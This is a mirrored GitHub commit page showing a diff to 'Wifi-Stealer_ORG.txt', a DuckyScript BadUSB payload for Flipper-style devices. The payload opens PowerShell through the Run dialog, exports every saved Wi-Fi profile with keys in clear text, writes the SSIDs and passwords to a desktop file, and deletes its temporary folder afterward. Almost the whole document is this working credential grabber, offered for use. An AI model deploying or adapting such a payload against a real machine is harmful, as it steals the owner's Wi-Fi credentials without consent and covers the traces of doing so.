mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 14:30:21 +00:00
Merge pull request #147 from 7h30th3r0n3/patch-3
Update Wifi-Stealer_ORG.txt
This commit is contained in:
commit
4b4ced6917
@ -1,13 +1,19 @@
|
|||||||
REM Title: Wifi Stealer
|
REM Title: Wifi Stealer
|
||||||
REM Author: 7h30th3r0n3
|
REM Author: 7h30th3r0n3
|
||||||
REM Target: Tested on Windows 7/8/10/11
|
REM Reworked: the0bone
|
||||||
REM Version: 1.0
|
REM Target: Windows 7/8/10/11
|
||||||
|
REM Supported Layout keyboard: US/FR/DE
|
||||||
|
REM Version: 1.2
|
||||||
REM Category: Grabber
|
REM Category: Grabber
|
||||||
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
|
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRING powershell
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 2000
|
||||||
STRING cd C:\Users\$env:UserName\Desktop; netsh wlan export profile key=clear; Select-String -Path WiFi-* -Pattern 'keyMaterial' | % { $_ -replace '</?keyMaterial>', ''} | % {$_ -replace "C:\\Users\\$env:UserName\\Desktop\\", ''} | % {$_ -replace '.xml:22:', ''} > 0.txt; del WiFi-*;exit
|
REM setting variable
|
||||||
|
STRING $desktop = ([Environment]::GetFolderPath("Desktop"))
|
||||||
|
ENTER
|
||||||
|
REM Creating a new folder in Temp with random name to store the xml files and create single text file.
|
||||||
|
STRING New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> $desktop\0.txt; Set-Location -Path "$env:temp"; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse; exit
|
||||||
ENTER
|
ENTER
|
||||||
|
Loading…
Reference in New Issue
Block a user